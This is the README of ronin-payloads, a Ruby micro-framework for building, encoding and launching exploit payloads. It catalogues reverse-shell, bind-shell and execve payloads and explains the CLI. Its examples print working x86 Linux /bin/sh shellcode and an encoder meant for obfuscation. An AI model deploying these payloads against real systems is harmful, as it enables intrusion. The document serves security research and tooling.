README.md
# ronin-payloads
[![CI](https://github.com/ronin-rb/ronin-payloads/actions/workflows/ruby.yml/badge.svg)](https://github.com/ronin-rb/ronin-payloads/actions/workflows/ruby.yml)
[![Code Climate](https://codeclimate.com/github/ronin-rb/ronin-payloads.svg)](https://codeclimate.com/github/ronin-rb/ronin-payloads)
[![Gem Version](https://badge.fury.io/rb/ronin-payloads.svg)](https://badge.fury.io/rb/ronin-payloads)
* [Website](https://ronin-rb.dev/)
* [Source](https://github.com/ronin-rb/ronin-payloads)
* [Issues](https://github.com/ronin-rb/ronin-payloads/issues)
* [Documentation](https://ronin-rb.dev/docs/ronin-payloads/frames)
* [Discord](https://discord.gg/6WAb3PsVX9) |
[Mastodon](https://infosec.exchange/@ronin_rb)
## Description
ronin-payloads is a Ruby micro-framework for writing and running exploit
payloads. ronin-payloads allows one to write payloads as plain old Ruby classes.
ronin-payloads can be distributed as Ruby files or in git repositories that can
be installed with [ronin-repos].
**tl;dr** It's like `msfvenom` but simpler and more modular.
ronin-payloads is part of the [ronin-rb] project, a [Ruby] toolkit for security
research and development.
## Features
* Provides a succinct syntax and API for writing payloads in as few lines as
possible.
* Supports defining Payloads as plain old Ruby classes.
* Provides base classes for a variety of languages and payload types
(ASM, Shellcode, C, Go, Rust, Java, JSP, PHP, Python, Ruby, NodeJS, Shell,
PowerShell, SQL, XML, HTML, URL).
* Provides built-in common payloads:
* Command-line reverse shells:
* Awk
* Bash
* Lua
* NodeJS
* OpenSSL
* Perl
* PHP
* PowerShell
* Python
* Ruby
* Java
* Reverse shell
* PHP
* Command exec.
* Shellcode:
* `execve(/bin/sh)`:
* Linux (ARM, MIPS, PPC, x86, x86-64)
* FreeBSD (x86, x86-64)
* macOS (x86-64)
* NetBSD (x86)
* OpenBSD (x86)
* bind shell:
* Linux (ARM, MIPS, x86, x86-64)
* FreeBSD (x86)
* OpenBSD (x86)
* reverse shell:
* Linux (ARM, MIPS, PPC, x86, x86-64)
* macOS (x86-64)
* FreeBSD (x86)
* NetBSD (x86)
* Supports adding additional encoders to payloads for further obfuscation.
* Integrates with the [Ronin Post-Exploitation][ronin-post_ex] library.
* Provides a simple CLI for building, encoding, launching, and generating new
payloads.
* Has 86% documentation coverage.
* Has 99% test coverage.
## Anti-Features
* No magic: exploits are defined as classes in files.
* No global state that could cause memory leaks.
* Not a big bulky framework, just a library.
* Not a central repository. Additional [ronin-payloads] can be hosted in other
git repositories. This prevents censorship of offensive security tools.
## Synopsis
```
Usage: ronin-payloads [options] [COMMAND [ARGS...]]
Options:
-h, --help Print help information
Arguments:
[COMMAND] The command name to run
[ARGS ...] Additional arguments for the command
Commands:
build
encode
encoder
encoders
help
irb
launch
list, ls
new
show, info
```
List available payloads:
```shell
$ ronin-payloads list
cmd/awk/reverse_shell
cmd/bash/reverse_shell
cmd/lua/reverse_shell
cmd/node/reverse_shell
cmd/openssl/reverse_shell
cmd/perl/reverse_shell
cmd/php/reverse_shell
cmd/powershell/reverse_shell
cmd/python/reverse_shell
cmd/ruby/reverse_shell
java/reverse_shell
php/cmd_exec
php/download_exec
shellcode/freebsd/x86/bind_shell
shellcode/freebsd/x86/execve
shellcode/freebsd/x86/reverse_shell
shellcode/freebsd/x86_64/execve
shellcode/linux/arm/bind_shell
shellcode/linux/arm/execve
shellcode/linux/arm/reverse_shell
shellcode/linux/mips/bind_shell
shellcode/linux/mips/execve
shellcode/linux/mips/reverse_shell
shellcode/linux/ppc/execve
shellcode/linux/ppc/reverse_shell
shellcode/linux/x86/bind_shell
shellcode/linux/x86/execve
shellcode/linux/x86/reverse_shell
shellcode/linux/x86_64/bind_shell
shellcode/linux/x86_64/execve
shellcode/linux/x86_64/reverse_shell
shellcode/macos/x86_64/execve
shellcode/macos/x86_64/reverse_shell
shellcode/netbsd/x86/execve
shellcode/netbsd/x86/reverse_shell
shellcode/openbsd/x86/bind_shell
shellcode/openbsd/x86/execve
shellcode/windows/x86_64/cmd
test/open_redirect
test/xss
```
Install a 3rd-party repository of payloads:
```shell
$ ronin-repos install https://github.com/user/payloads.git
```
Print additional information about a specific payload:
```shell
$ ronin-payloads show NAME
```
List available payload encoders:
```shell
$ ronin-payloads encoders
```
Print additional information about a specific encoder:
```shell
$ ronin-payloads encoder NAME
```
Build and output a payload:
```shell
$ ronin-payloads build NAME
```
Load a payload from a file, then build and output it:
```shell
$ ronin-payloads build -f FILE NAME
```
Generate a boilerplate payload file, with some custom information:
```shell
$ ronin-payloads new example_payload.rb \
--name Example --arch i686 --os Linux \
--authors Postmodern --description "This is an example."
```
Generate a ronin repository of your own payloads (or exploits):
```shell
$ ronin-repos new my-repo
$ cd my-repo/
$ mkdir payloads
$ ronin-payloads new payloads/my_payload.rb \
--name MyPayload --arch i686 --os Linux \
--authors You --description "This is my payload."
$ vim payloads/my_payload.rb
$ git add payloads/my_payload.rb
$ git commit
$ git push
```
## Examples
Define a `/bin/sh` shellcode payload:
```ruby
require 'ronin/payloads/shellcode_payload'
module Ronin
module Payloads
class LinuxX86BinSh < ShellcodePayload
register 'shellcode/linux/x86/bin_sh'
summary 'x86 Linux /bin/sh shellcode'
description <<~EOS
Shellcode that spawns a local /bin/sh shell
EOS
arch :x86
os :linux
def build
@payload = "1\xc0Ph//shh/bin\x89\xdcPS\x89\xcc1\xd2\xcd\x0b"
end
end
end
end
```
Define a `/bin/sh` shellcode payload in pure-Ruby:
```ruby
require 'ronin/payloads/shellcode_payload'
module Ronin
module Payloads
module Shellcode
module Linux
module X86
class BinSh < ShellcodePayload
register 'shellcode/linux/x86/bin_sh'
description <<~DESC
Shellcode that spawns a local /bin/sh shell
DESC
arch :x86
os :linux
def build
shellcode do
xor eax, eax
push eax
push 0x68732f2f
push 0x6e69622f
mov esp, ebx
push eax
push ebx
mov esp, ecx
xor edx, edx
int 0xb
end
end
end
end
end
end
end
end
```
Define a payload encoder class:
```ruby
require 'ronin/encoders/encoder'
module Ronin
module Payloads
module Encoders
module Text
class Base64 < Ronin::Encoders::Encoder
register 'text/base64'
description <<~DESC
Example base64 payload encoder
DESC
arch :x86
os :linux
def encode(data)
data.to_s.base64_encode
end
end
end
end
end
end
```
## Requirements
* [Ruby] >= 3.0.0
* [ronin-support] ~> 1.0
* [ronin-code-asm] ~> 1.0
* [ronin-post_ex] ~> 0.1
* [ronin-core] ~> 0.1
* [ronin-repos] ~> 0.1
## Install
```shell
$ gem install ronin-payloads
```
### Gemfile
```ruby
gem 'ronin-payloads', '~> 0.1'
```
### gemspec
```ruby
gem.add_dependency 'ronin-payloads', '~> 0.1'
```
## Development
1. [Fork It!](https://github.com/ronin-rb/ronin-payloads/fork)
2. Clone It!
3. `cd ronin-payloads/`
4. `bundle install`
5. `git checkout -b my_feature`
6. Code It!
7. `bundle exec rake spec`
8. `git push origin my_feature`
## Disclaimer
ronin-payloads only contains basic or generic exploit payloads that can be
easily found online or in other Open Source security tools. ronin-payloads
**does not** contain by default any weaponized payloads. These payloads are
themselves not harmful without an exploit to deliver them. Therefor,
ronin-payloads **must not** and **should not** be considered to be
malicious software (malware) or malicious in nature.
## License
Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
ronin-payloads is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published
by the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
ronin-payloads is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with ronin-payloads. If not, see <https://www.gnu.org/licenses/>.
[Ruby]: https://www.ruby-lang.org
[ronin-rb]: https://ronin-rb.dev
[ronin-support]: https://github.com/ronin-rb/ronin-support#readme
[ronin-code-asm]: https://github.com/ronin-rb/ronin-code-asm#readme
[ronin-core]: https://github.com/ronin-rb/ronin-core#readme
[ronin-repos]: https://github.com/ronin-rb/ronin-repos#readme
[ronin-post_ex]: https://github.com/ronin-rb/ronin-post_ex#readme